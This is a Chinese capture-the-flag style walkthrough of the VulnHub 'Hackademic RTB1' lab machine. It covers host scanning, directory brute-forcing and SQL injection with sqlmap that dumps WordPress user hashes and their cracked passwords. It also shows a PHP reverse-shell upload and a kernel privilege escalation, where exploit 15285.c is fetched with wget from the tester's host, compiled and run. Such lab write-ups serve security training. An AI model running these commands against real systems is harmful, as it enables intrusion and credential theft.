HACKADEMIC: RTB1靶机实战

2024年12月10日17:47:30评论11 views字数 2087阅读6分57秒阅读模式

靶场下载地址：

https://www.vulnhub.com/entry/hackademic-rtb1,17/

信息搜集

HACKADEMIC: RTB1靶机实战

一、Nmap进行扫描

nmap -sP 192.168.128.0/24  #对自己的靶机网段进行存活探测，获取靶机地址nmap -T4 -A -p- 192.168.128.136  #对目标进行全端口扫描

HACKADEMIC: RTB1靶机实战

二、web探测利用

对目标目录进行扫描，使用dirsearch工具：python dirsearch.py -u http://192.168.128.136/ -e *并没有获取到什么信息，继续从页面中探索发现页面中target可以进行点击，跳转到了如下目录http://192.168.128.136/Hackademic_RTB1对此目录再次进行目录扫描python dirsearch.py -u http://192.168.128.136/Hackademic_RTB1/ -e 经过扫描发现以下目录：/Hackademic_RTB1/wp-admin//Hackademic_RTB1/wp-content//Hackademic_RTB1/wp-includes/Hackademic_RTB1/xmlrpc.php/Hackademic_RTB1/wp.php/Hackademic_RTB1/wp-register.php/Hackademic_RTB1/wp-login.php

HACKADEMIC: RTB1靶机实战

通过访问发现后台登录地址http://192.168.128.136/Hackademic_RTB1/wp-login.php对登录入口进行账号密码暴力破解，未成功对页面进行探测，发现此处疑似存在sql注入：http://192.168.128.136/Hackademic_RTB1/?cat=1

HACKADEMIC: RTB1靶机实战

http://192.168.128.136/Hackademic_RTB1/?cat=1 and 1=2

HACKADEMIC: RTB1靶机实战

http://192.168.128.136/Hackademic_RTB1/?cat=1 and 1=1

HACKADEMIC: RTB1靶机实战

经过手工探测，发现此处存在sql注入漏洞，使用sqlmap自动化注入# 查询库名python2 sqlmap.py -u "http://192.168.128.136/Hackademic_RTB1/?cat=1" --dbs# 查询表名python2 sqlmap.py -u "http://192.168.128.136/Hackademic_RTB1/?cat=1" -D wordpress --tables# 查询列名python2 sqlmap.py -u "http://192.168.128.136/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns# 查询字段内数据python2 sqlmap.py -u "http://192.168.128.136/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump成功获取到账户密码user_login  | user_passNickJames  | 21232f297a57a5a743894a0e4a801fc3 (admin)    MaxBucky  | 50484c19f1afdaf3841a0d821ed393d2 (kernel)   GeorgeMiller  | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   JasonKonnors  | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  TonyBlack  | a6e514f9486b83cb53d8d932f9a04292 (napoleon) JohnSmith  | b986448f0bb9e5e124ca91d3d650f52c (PUPPIES)

HACKADEMIC: RTB1靶机实战

三、文件上传GetShell

通过刚才获取到的账号密码登录测试发现GeorgeMiller用户有配置选项http://192.168.128.136/Hackademic_RTB1/wp-login.phpGeorgeMiller：q1w2e3开启文件上传功能，允许php文件上传

HACKADEMIC: RTB1靶机实战

生成一个反弹shell的php脚本，进行文件上传访问文件位置：http://192.168.128.136/Hackademic_RTB1/wp-content/reverseShell.php成功反弹shell

HACKADEMIC: RTB1靶机实战

四、提权

尝试内核漏洞提权uname -a # 获取内核版本# 搜索可利用的提权脚本searchsploit 2.6.3searchsploit -m 15285.c #下载利用脚本到当前目录# 执行以下操作，进行提权cd /tmpwget http://192.168.128.133:8088/15285.cgcc -o exp 15285.cchmod +x exp./exp成功获取root权限

HACKADEMIC: RTB1靶机实战

原文始发于微信公众号（渗透笔记）：HACKADEMIC: RTB1靶机实战

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

HACKADEMIC: RTB1靶机实战

Hackable_III

Vulnerable Docker 1靶机通关教学

xss靶场

PoC 针对 Ingress NGINX 漏洞编号 CVE-2025-1097、1098、24514、1974

实战-菠菜通杀

攻防实战|记一次和安全产品贴身肉搏

【红队思路】钓鱼-资源捆绑Bypass国内AV

Src高危实战记录

对DogsVsCats例子的调优模型训练过程（二）

Sitecore几年前的洞CVE-2019-9874：反序列化实现的未经认证的 RCE（CVSS 9.8）

发表评论

在线咨询

微信